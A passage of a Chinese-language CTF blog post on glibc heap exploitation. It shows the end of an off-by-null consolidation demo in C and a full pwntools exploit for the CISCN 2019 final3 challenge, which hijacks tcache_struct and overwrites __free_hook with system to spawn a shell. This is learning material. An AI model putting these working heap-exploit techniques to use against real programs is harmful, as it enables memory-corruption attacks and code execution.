((<span class="hljs-type">char</span>*)a3)[<span class="hljs-number">8</span>] = <span class="hljs-string">&#x27;\x10&#x27;</span>;<br>	((<span class="hljs-type">char</span>*)a3)[<span class="hljs-number">9</span>] = <span class="hljs-string">&#x27;\x00&#x27;</span>;<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;After the overwrite, a-&gt;bck is: %p, which is the chunk pointer to our fake chunk\n&quot;</span>, ((<span class="hljs-type">void</span> **)a3)[<span class="hljs-number">1</span>]);<br>	<span class="hljs-comment">// pass unlink_chunk in malloc.c:</span><br>	<span class="hljs-comment">//      mchunkptr fd = p-&gt;fd;</span><br>	<span class="hljs-comment">//      mchunkptr bk = p-&gt;bk;</span><br>	<span class="hljs-comment">//      if (__builtin_expect (fd-&gt;bk != p || bk-&gt;fd != p, 0))</span><br>	<span class="hljs-comment">//          malloc_printerr (&quot;corrupted double-linked list&quot;);</span><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;And we have:\n&quot;</span><br>		 <span class="hljs-string">&quot;fake_chunk-&gt;fd-&gt;bk == a-&gt;bk == fake_chunk\n&quot;</span><br>		 <span class="hljs-string">&quot;fake_chunk-&gt;bk-&gt;fd == b-&gt;fd == fake_chunk\n&quot;</span><br>		 );<br><br>	<span class="hljs-comment">// step6: add fake chunk into unsorted bin by off-by-null</span><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;\nStep6: Use backward consolidation to add fake chunk into unsortedbin&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Take victim out from unsortedbin&quot;</span>);<br>	<span class="hljs-type">void</span> *victim2 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x4f0</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%p\n&quot;</span>, victim2);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;off-by-null into the size of vicim&quot;</span>);<br>	<span class="hljs-comment">/* VULNERABILITY */</span><br>	((<span class="hljs-type">char</span> *)victim2)[<span class="hljs-number">-8</span>] = <span class="hljs-string">&#x27;\x00&#x27;</span>;<br>	<span class="hljs-comment">/* VULNERABILITY */</span><br><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Now if we free victim, libc will think the fake chunk is a free chunk above victim\n&quot;</span><br>			<span class="hljs-string">&quot;It will try to backward consolidate victim with our fake chunk by unlinking the fake chunk then\n&quot;</span><br>			<span class="hljs-string">&quot;add the merged chunk into unsortedbin.&quot;</span><br>			);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;For our fake chunk, because of what we did in step4,\n&quot;</span><br>			<span class="hljs-string">&quot;now P-&gt;fd-&gt;bk(%p) == P(%p), P-&gt;bk-&gt;fd(%p) == P(%p)\n&quot;</span><br>			<span class="hljs-string">&quot;so the unlink will succeed\n&quot;</span>, ((<span class="hljs-type">void</span> **)a3)[<span class="hljs-number">1</span>], prev, ((<span class="hljs-type">void</span> **)b2)[<span class="hljs-number">0</span>], prev);<br>	<span class="hljs-built_in">free</span>(victim);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;After freeing the victim, the new merged chunk is added to unsorted bin&quot;</span><br>			<span class="hljs-string">&quot;And it is overlapped with the prev chunk&quot;</span>);<br><br>	<span class="hljs-comment">// step7: validate the chunk overlapping</span><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Now let&#x27;s validate the chunk overlapping&quot;</span>);<br>	<span class="hljs-type">void</span> *merged = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;merged: malloc(0x100) = %p\n&quot;</span>, merged);<br>	<span class="hljs-built_in">memset</span>(merged, <span class="hljs-string">&#x27;A&#x27;</span>, <span class="hljs-number">0x80</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Now merged&#x27;s content: %s\n&quot;</span>, (<span class="hljs-type">char</span> *)merged);<br><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Overwrite prev&#x27;s content&quot;</span>);<br>	<span class="hljs-built_in">memset</span>(prev2, <span class="hljs-string">&#x27;C&#x27;</span>, <span class="hljs-number">0x80</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;merged&#x27;s content has changed to: %s\n&quot;</span>, (<span class="hljs-type">char</span> *)merged);<br><br>	assert(<span class="hljs-built_in">strstr</span>(merged, <span class="hljs-string">&quot;CCCCCCCCC&quot;</span>));<br>&#125;<br></code></pre></td></tr></table></figure>
<p>首先第一步, 通过各种手段使得我们真实的利用从后两字节为\x00的地址处开始, 之后先一堆东西, 不知道在做什么</p>
<p>此时我们把断点下到63行, 观察一下现在堆上的东西</p>
<p><img src="image-20231024003817588.png" srcset="/img/loading.gif" lazyload alt="image-20231024003817588"></p>
<p>此时unsorted中的形式是这样的:</p>
<p><img src="image-20231024004308565.png" srcset="/img/loading.gif" lazyload alt="image-20231024004308565"></p>
<blockquote>
<p>10.31 先 🕊 🌶</p>
</blockquote>
<h2 id="0x02-2️⃣-3️⃣5️⃣">0x02 2️⃣.3️⃣5️⃣</h2>
<p>没写完 先🕊</p>
<h2 id="0x03-Othersheap">0x03 Othersheap</h2>
<blockquote>
<p>0x03就是 平时刷什么题的时候遇到的有意思的做法 往这里一起写一写</p>
<p>这个博客是分很多天写的, 逻辑确实很混乱, 但是我觉得还好吧()</p>
</blockquote>
<h3 id="1-tcache-struct-hijack">1.tcache_struct hijack</h3>
<p>例题是ciscn 19年的final3, buu有, 这个题在这里不选择常规的方法, 因为他原本的环境里没有double free的检测</p>
<p><img src="image-20231031210329468.png" srcset="/img/loading.gif" lazyload alt="image-20231031210329468"></p>
<p>每次分配后会给出地址, 这里是唯一输出, 所以首先思路应该是分配到在libc里的一个chunk.</p>
<p>然后还能看到一个裸的uaf, 如果不用stash可以伪造一个大chunk进unsorted再改</p>
<blockquote>
<p>但是我怎么感觉还不如这种方法, 又绕过了检查, <s>又不是那么难想</s></p>
</blockquote>
<p>所以在这里:</p>
<ul>
<li>
<p>我们首先是使用stash机制完成double free</p>
</li>
<li>
<p>但是stash需要很多次申请机会, 本身我们就只有24次, 实际上的stash过程就需要用到19次, 直到20th才轮到我们去进行任意地址写</p>
</li>
<li>
<p>故选择劫持 tcache struct, 就是放链表的那个大的结构体</p>
<ul>
<li>该结构体在libc2.27中是0x250大小, (后续版本可能有些差别), 前0x40段是count, 后面的是链表头地址</li>
<li>可以通过这里改count, 改掉这个之后可以达到<strong>不进入tcache</strong>的效果</li>
<li>由于链表头就在这个chunk里存着, 故可以通过控制这里达到直接控制chunk的效果, 似乎能做到些任意写</li>
</ul>
<blockquote>
<ul>
<li>这个结构体扔进unsorted之后, 再申请是不切割的(2.27的这个题是这样的), 暂时我还不知道是为什么,</li>
</ul>
</blockquote>
</li>
</ul>
<p>后续去搜了搜, 好像有点像个板子(), exp:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>,os=<span class="hljs-string">&#x27;linux&#x27;</span>)<br><span class="hljs-comment">#context(log_level=&#x27;debug&#x27;)</span><br>r=process(<span class="hljs-string">&quot;./cf33&quot;</span>)<br><span class="hljs-comment">#r=remote(&quot;node4.buuoj.cn&quot;,27946)</span><br>elf=ELF(<span class="hljs-string">&quot;./cf33&quot;</span>)<br>libc=ELF(<span class="hljs-string">&quot;./libc-2.27.so&quot;</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">debug</span>():<br>    gdb.attach(r)<br>    pause()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">add</span>(<span class="hljs-params">idx,size,content</span>):<br>    r.sendlineafter(<span class="hljs-string">&quot;&gt;&quot;</span>,<span class="hljs-string">&quot;1&quot;</span>)<br>    r.recvuntil(<span class="hljs-string">&quot;index&quot;</span>)<br>    r.sendline(<span class="hljs-built_in">str</span>(idx))<br>    r.recvuntil(<span class="hljs-string">&quot;size&quot;</span>)<br>    r.sendline(<span class="hljs-built_in">str</span>(size))<br>    r.sendafter(<span class="hljs-string">&quot;something&quot;</span>,content)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">remove</span>(<span class="hljs-params">idx</span>):<br>    r.sendlineafter(<span class="hljs-string">&quot;&gt;&quot;</span>,<span class="hljs-string">&quot;2&quot;</span>)<br>    r.sendlineafter(<span class="hljs-string">&quot;index&quot;</span>,<span class="hljs-built_in">str</span>(idx))<br><br>add(<span class="hljs-number">0</span>,<span class="hljs-number">0x70</span>,<span class="hljs-string">b&quot;a&quot;</span>)<br>r.recvuntil(<span class="hljs-string">&quot;gift :0x&quot;</span>)<br>heap_base=<span class="hljs-built_in">int</span>(r.recv(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>)-<span class="hljs-number">0x11e70</span><br>log.success(<span class="hljs-string">&quot;heap_base=&quot;</span>+<span class="hljs-built_in">hex</span>(heap_base))<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">10</span>):<br>    add(i,<span class="hljs-number">0x70</span>,<span class="hljs-string">b&quot;a&quot;</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>    remove(i)<br><span class="hljs-comment">#debug()</span><br>remove(<span class="hljs-number">7</span>)<br>remove(<span class="hljs-number">8</span>)<br>remove(<span class="hljs-number">7</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10</span>,<span class="hljs-number">17</span>):<br>    add(i,<span class="hljs-number">0x70</span>,<span class="hljs-string">b&quot;/bin/sh&quot;</span>)<br><br>add(<span class="hljs-number">17</span>,<span class="hljs-number">0x70</span>,p64(heap_base+<span class="hljs-number">0x10</span>))<br><span class="hljs-comment">#debug()</span><br>add(<span class="hljs-number">18</span>,<span class="hljs-number">0x70</span>,<span class="hljs-string">b&quot;a&quot;</span>)<br>add(<span class="hljs-number">19</span>,<span class="hljs-number">0x70</span>,<span class="hljs-string">b&quot;a&quot;</span>)<br><span class="hljs-comment">#debug()</span><br>payload=(<span class="hljs-string">b&#x27;\x00&#x27;</span>*<span class="hljs-number">35</span>+<span class="hljs-string">b&#x27;\xff&#x27;</span>*<span class="hljs-number">1</span>).ljust(<span class="hljs-number">0x40</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>)+p64(heap_base+<span class="hljs-number">0x10</span>)*<span class="hljs-number">6</span><br><span class="hljs-comment">#print(payload)</span><br>add(<span class="hljs-number">20</span>,<span class="hljs-number">0x70</span>,payload)<br><span class="hljs-comment">#debug()</span><br>remove(<span class="hljs-number">20</span>)<br><span class="hljs-comment">#debug()</span><br>add(<span class="hljs-number">21</span>,<span class="hljs-number">0x20</span>,<span class="hljs-string">b&quot;a&quot;</span>)<br><span class="hljs-comment">#debug()</span><br>add(<span class="hljs-number">22</span>,<span class="hljs-number">0x20</span>,<span class="hljs-string">b&quot;a&quot;</span>)<br>r.recvuntil(<span class="hljs-string">&quot;gift :0x&quot;</span>)<br>libc_base=<span class="hljs-built_in">int</span>(r.recv(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>)-<span class="hljs-number">0x3ebca0</span><br>log.success(<span class="hljs-string">&quot;libc_base=&quot;</span>+<span class="hljs-built_in">hex</span>(libc_base))<br><span class="hljs-comment">#debug()</span><br>add(<span class="hljs-number">23</span>,<span class="hljs-number">0x50</span>,(<span class="hljs-string">b&#x27;\x07&#x27;</span>*<span class="hljs-number">10</span>).ljust(<span class="hljs-number">0x40</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>)+p64(libc_base+libc.sym[<span class="hljs-string">&#x27;__free_hook&#x27;</span>]) * <span class="hljs-number">2</span>)<br>add(<span class="hljs-number">24</span>,<span class="hljs-number">0x10</span>,p64(libc_base+libc.sym[<span class="hljs-string">&quot;system&quot;</span>]))<br><span class="hljs-comment">#debug()</span><br>remove(<span class="hljs-number">10</span>)<br><br>r.interactive()<br></code></pre></td></tr></table></figure>
<p>主要思路是在19次达成stash之后, 从第20次起改掉0x250的count位和小chunk的链表头, 使结构体chunk进入unsorted, 再分配2次即可分配到libc里, 通过输出地址leak libc</p>
<p>然后再次劫持, 把链表头改成free_hook即可, 后续是常规过程.</p>
<h2 id="0x04-Others">0x04 Others</h2>
<p>在脱离用户态之前这里希望都可以一直更新, 能一直写下去就好.</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Pwn/" class="category-chain-item">Pwn</a>
  
  
    <span>></span>
    
  <a href="/categories/Pwn/Heap/" class="category-chain-item">Heap</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>How2HE4p!</div>
      <div>http://example.com/2023/10/31/How2HEAP/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>Luo</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>October 31, 2023</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/10/22/Stack/" title="Advanced Stack Summary">
                        <span class="hidden-mobile">Advanced Stack Summary</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="waline"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#waline', function() {
      Fluid.utils.createCssLink('https://cdn.staticfile.org/waline/2.15.5/waline.min.css')
      Fluid.utils.createScript('https://cdn.staticfile.org/waline/2.15.5/waline.min.js', function() {
        var options = Object.assign(
          {"serverURL":"https://pl-c579209fn-zangetsu486s-projects.vercel.app/","path":"window.location.pathname","meta":["nick","mail","link"],"requiredMeta":["nick"],"lang":"zh-CN","emoji":["https://cdn.jsdelivr.net/gh/walinejs/emojis/weibo"],"dark":"html[data-user-color-scheme=\"dark\"]","wordLimit":0,"pageSize":10},
          {
            el: '#waline',
            path: window.location.pathname
          }
        )
        Waline.init(options);
        Fluid.utils.waitElementVisible('#waline .vcontent', () => {
          var imgSelector = '#waline .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        Read: 
        <span id="busuanzi_value_site_pv"></span>
         
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        Reader: 
        <span id="busuanzi_value_site_uv"></span>
         
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
